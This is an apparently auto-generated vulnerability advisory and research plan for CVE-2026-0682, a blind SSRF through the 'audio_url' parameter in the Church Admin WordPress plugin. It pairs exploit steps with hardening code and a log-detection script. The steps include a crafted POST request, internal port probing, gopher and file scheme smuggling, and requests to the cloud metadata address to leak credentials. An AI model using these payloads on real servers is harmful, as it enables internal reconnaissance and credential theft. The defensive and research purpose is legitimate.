CVE-2026-0682

Church Admin <= 5.0.28 - Authenticated (Administrator+) Blind Server-Side Request Forgery via 'audio_url' Parameter

Server-Side Request Forgery (SSRF)
2.2
CVSS Score
low
Severity
5.0.29
Patched in
1d
Time to patch

Description

The Church Admin plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 5.0.28 due to insufficient validation of user-supplied URLs in the 'audio_url' parameter. This makes it possible for authenticated attackers, with Administrator-level access, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
High
Privileges Required
High
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
Low
Availability
None

Technical Details

Affected versions: <=5.0.28
Published: January 16, 2026
Last updated: January 17, 2026
Affected plugin: church-admin

Source Code

WordPress.org SVN
Research Plan
Unverified


This research plan provides a technical roadmap for exploiting the Blind Server-Side Request Forgery (SSRF) vulnerability in the Church Admin plugin (CVE-2026-0682).


1. Vulnerability Summary

The Church Admin plugin (<= 5.0.28) fails to properly validate the audio_url parameter when processing sermon entries. An authenticated administrator can provide an arbitrary internal or external URL, which the server will attempt to fetch (likely to retrieve file size, duration, or metadata). Because the response from the remote server is not directly returned to the user, this is a Blind SSRF.

2. Attack Vector Analysis

  • Vulnerable Endpoint: wp-admin/admin.php?page=church_admin/index.php&section=sermons&action=edit-sermon (or similar sermon creation/edit endpoint).
  • Action Hook: Likely handled via admin_init or a specific page handler in the Church Admin plugin.
  • Vulnerable Parameter: audio_url
  • Authentication Required: Administrator level privileges.
  • Precondition: The plugin must be active, and the attacker must have access to the Sermon management section.

3. Code Flow (Inferred)

  1. Entry Point: The administrator navigates to the "Sermons" section of the Church Admin menu and clicks "Add Sermon" or "Edit Sermon".
  2. Form Submission: A POST request is sent to wp-admin/admin.php with the audio_url parameter.
  3. Vulnerable Sink: The plugin likely calls a function such as church_admin_get_remote_file_size() or uses wp_remote_get() / wp_remote_head() directly on the audio_url without verifying if the host is a public IP address or if the scheme is restricted to HTTP/HTTPS.
  4. SSRF Execution: The WordPress server originates a request to the attacker-supplied URL (e.g., http://127.0.0.1:22 or http://169.254.169.254/).
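The sink described in the inferred code flow, shown beside the hardened form a reviewer would expect. This is an added illustration and not the Church Admin plugin's code: the two handler names and the use of the Content-Length header are assumptions, and the fix actually shipped in 5.0.29 is not reproduced here. The WordPress functions called (wp_remote_head, wp_safe_remote_head, wp_http_validate_url, esc_url_raw, wp_unslash, wp_remote_retrieve_header) are real WordPress APIs.

```php
<?php
// Added example, not the plugin's code. Function names are hypothetical;
// the WordPress API calls are real.

// Vulnerable pattern: the user-supplied URL goes straight into the HTTP API.
// wp_remote_head() does not set reject_unsafe_urls, so 127.0.0.1, RFC 1918
// addresses and link-local hosts on any port are all fetched by the server,
// and the caller only ever sees a size, which is what makes the SSRF blind.
function example_save_sermon_vulnerable() {
    $audio_url = isset( $_POST['audio_url'] ) ? wp_unslash( $_POST['audio_url'] ) : '';

    $response = wp_remote_head( $audio_url ); // SSRF sink: no scheme, host or port check

    if ( is_wp_error( $response ) ) {
        return 0;
    }
    return (int) wp_remote_retrieve_header( $response, 'content-length' );
}

// Hardened pattern: restrict the scheme, reject internal hosts and odd ports,
// and let the HTTP API re-check the URL and every redirect it follows.
function example_save_sermon_hardened() {
    $raw = isset( $_POST['audio_url'] ) ? wp_unslash( $_POST['audio_url'] ) : '';

    // esc_url_raw() with an explicit protocol list returns '' for gopher://,
    // file:// or any other scheme outside the allowlist.
    $audio_url = esc_url_raw( $raw, array( 'http', 'https' ) );
    if ( '' === $audio_url ) {
        return new WP_Error( 'bad_scheme', 'Only http(s) audio URLs are accepted.' );
    }

    // wp_http_validate_url() rejects credentials in the URL, loopback, 10/8,
    // 172.16/12 and 192.168/16 hosts (unless the http_request_host_is_external
    // filter allows them) and ports other than 80, 443 and 8080.
    if ( false === wp_http_validate_url( $audio_url ) ) {
        return new WP_Error( 'unsafe_url', 'Audio URL points at a disallowed host or port.' );
    }

    // wp_safe_remote_head() sets reject_unsafe_urls, so the same validation
    // is applied inside the HTTP API and to each redirect target.
    $response = wp_safe_remote_head( $audio_url, array( 'timeout' => 5, 'redirection' => 2 ) );
    if ( is_wp_error( $response ) ) {
        return $response;
    }
    return (int) wp_remote_retrieve_header( $response, 'content-length' );
}
```

Two caveats when relying on wp_http_validate_url(): it skips the host checks entirely when the supplied host matches the site's own home host, and it only blocks the IPv4 ranges it enumerates, so confirm in the WordPress version you run that link-local 169.254.0.0/16 (the cloud metadata range) and IPv6 loopback are covered, and add your own check in front of it if they are not.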

4. Nonce Acquisition Strategy

The Church Admin plugin uses standard WordPress admin form nonces.

  1. Identify the Page: The sermon edit/add page is located at:
    wp-admin/admin.php?page=church_admin/index.php&section=sermons&action=edit-sermon
  2. Navigate and Extract:
    • Open the sermon creation page in a browser while logged in as an administrator.
    • Extract the nonce value from the form with JavaScript, for example document.querySelector('input[name="church_admin_nonce"]').value or document.querySelector('#church_admin_sermon_form [name="_wpnonce"]').value. (The field name church_admin_nonce is inferred; read the actual name from the rendered form.)

5. Exploitation Strategy

We will perform a blind SSRF to confirm the vulnerability by attempting to hit an internal service or a local port.

Step 1: Environment Setup

  • Ensure Church Admin <= 5.0.28 is installed.
  • Login as an Administrator.

Step 2: Probe for SSRF

  • Target: http://127.0.0.1:80 (The WordPress instance itself).
  • Payload:
    POST /wp-admin/admin.php?page=church_admin/index.php&section=sermons&action=edit-sermon HTTP/1.1
    Host: localhost:8080
    Content-Type: application/x-www-form-urlencoded
    Cookie: [Admin Cookies]
    
    church_admin_nonce=[NONCE]&save_sermon=1&audio_url=http://127.0.0.1:80/&file_title=SSRF_Test&sermon_date=2024-01-01
    

Step 3: Verification of Blind SSRF
Since the response is blind, we use timing or state changes:

  1. Timing Attack: Use an internal address that is known not to respond (e.g., 10.0.0.1) and compare the save request's response time against a known open port (127.0.0.1:80). A fetch to an unreachable host waits for the HTTP API's timeout (5 seconds by default in WordPress), while an open port, or a closed port on a live host, answers immediately.
  2. Access Logs: Check the web server's access log (e.g., /var/log/apache2/access.log) for a request from 127.0.0.1 carrying the WordPress HTTP API's User-Agent, which shows the server made a request to itself.
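The access-log check from Step 3, written out as a small scanner. This is an added example, not part of the advisory or the plugin: it parses Apache combined-format lines and flags requests whose source is loopback and whose User-Agent starts with "WordPress/", the prefix the WordPress HTTP API sends by default. Routine wp-cron self-requests carry the same User-Agent and are excluded so they do not masquerade as SSRF hits. The log lines, timestamps and the WordPress version string in them are constructed for the example.

```php
<?php
// Added example, not the plugin's or the advisory's code. Sample log lines
// below are constructed.

const SELF_REQUEST_NOISE = array( '/wp-cron.php' );

// Parse one Apache combined-format line:
// %h %l %u [%t] "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
function parse_combined_log_line( $line ) {
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$/';
    if ( ! preg_match( $re, $line, $m ) ) {
        return null;
    }
    return array(
        'src'    => $m[1],
        'time'   => $m[2],
        'method' => $m[3],
        'target' => $m[4],
        'status' => (int) $m[5],
        'ua'     => $m[6],
    );
}

function is_loopback( $ip ) {
    return '::1' === $ip || 0 === strncmp( $ip, '127.', 4 );
}

// Return the entries that look like the WordPress instance fetching itself.
function find_self_requests( array $lines ) {
    $hits = array();
    foreach ( $lines as $line ) {
        $e = parse_combined_log_line( $line );
        if ( null === $e || ! is_loopback( $e['src'] ) || 0 !== strncmp( $e['ua'], 'WordPress/', 10 ) ) {
            continue;
        }
        $path = parse_url( $e['target'], PHP_URL_PATH );
        if ( in_array( $path, SELF_REQUEST_NOISE, true ) ) {
            continue; // scheduled wp-cron ping, expected on a healthy site
        }
        $hits[] = $e;
    }
    return $hits;
}

// Constructed sample: the admin's POST, the self-request the sink produced,
// and a routine wp-cron ping that must not be flagged.
$sample = array(
    '203.0.113.5 - - [16/Jan/2026:10:12:30 +0000] "POST /wp-admin/admin.php?page=church_admin/index.php&section=sermons&action=edit-sermon HTTP/1.1" 302 - "http://localhost:8080/wp-admin/" "Mozilla/5.0"',
    '127.0.0.1 - - [16/Jan/2026:10:12:30 +0000] "HEAD / HTTP/1.1" 200 - "-" "WordPress/6.7; http://localhost:8080"',
    '127.0.0.1 - - [16/Jan/2026:10:13:02 +0000] "POST /wp-cron.php?doing_wp_cron=1768558382 HTTP/1.1" 200 - "-" "WordPress/6.7; http://localhost:8080"',
);

foreach ( find_self_requests( $sample ) as $hit ) {
    printf( "%s %s %s %s -> %d [%s]\n", $hit['time'], $hit['src'], $hit['method'], $hit['target'], $hit['status'], $hit['ua'] );
}
```

Only the HEAD / line is reported. If the site sits behind a reverse proxy, or the sink fetches through an interface other than loopback, the source address will not be 127.0.0.1; in that case match on the User-Agent and the probed path alone and correlate by timestamp with the administrator's POST.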

6. Test Data Setup

  1. Plugin Installation: wp plugin install church-admin --version=5.0.28 --activate
  2. Admin User: Ensure a user with administrator role exists.
  3. Sermon Category: Some versions require a sermon category to exist before adding a sermon.
    • wp eval "church_admin_create_default_data();" (If function exists) or manually create a category via the UI.

7. Expected Results

  • Successful Exploitation: The WordPress server makes an outbound HTTP request to the URL specified in audio_url.
  • Blind Confirmation: The save request takes noticeably longer (up to the HTTP API's timeout, 5 seconds by default) when audio_url points at a filtered port or an unreachable host than when it points at an open port or a closed port on a live host, or a hit from 127.0.0.1 with the WordPress User-Agent appears in the server's own access log when 127.0.0.1 is used.

8. Verification Steps

After the HTTP request, use WP-CLI to check if the sermon was saved with the malicious URL (confirming the sink was reached):

wp db query "SELECT option_value FROM wp_options WHERE option_name = 'church_admin_sermons'"
# Or check the specific table if the plugin uses a custom table
wp db query "SELECT audio_url FROM wp_church_admin_sermon WHERE file_title = 'SSRF_Test'"

9. Alternative Approaches

  • OOB (Out-of-Band): If the environment allows external DNS/HTTP, use a webhook.site or interactsh URL.
  • Protocol Smuggling: Test if schemes other than http are supported, such as gopher:// or file://. If the sink goes through the WordPress HTTP API (wp_remote_get() and friends), non-http(s) schemes are refused with a WP_Error before any request is made, so a successful fetch of such a URL would indicate a direct cURL or stream wrapper call instead.
  • Metadata Services: If running in AWS/GCP, attempt to hit http://169.254.169.254/latest/meta-data/ to leak instance credentials.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Church Admin plugin for WordPress is vulnerable to Blind Server-Side Request Forgery (SSRF) in versions up to 5.0.28 due to insufficient validation of the 'audio_url' parameter during sermon creation and editing. This vulnerability allows authenticated administrators to force the server to make requests to arbitrary internal or external locations, potentially exposing sensitive information from internal network services or cloud metadata endpoints.

Exploit Outline

  1. Authenticate as a WordPress Administrator and navigate to the sermon management interface (e.g., admin.php?page=church_admin/index.php&section=sermons&action=edit-sermon).
  2. Extract the security nonce (church_admin_nonce) and other required form fields from the sermon creation page.
  3. Construct a POST request to the sermon saving action, setting the 'audio_url' parameter to a target internal URL (e.g., http://127.0.0.1:22 for port scanning or http://169.254.169.254/latest/meta-data/ for cloud environments).
  4. Submit the request and observe the server's behavior. Since the SSRF is blind, confirmation is typically achieved by monitoring for outbound traffic at an attacker-controlled endpoint or by performing timing analysis to identify differences between open and closed internal ports.
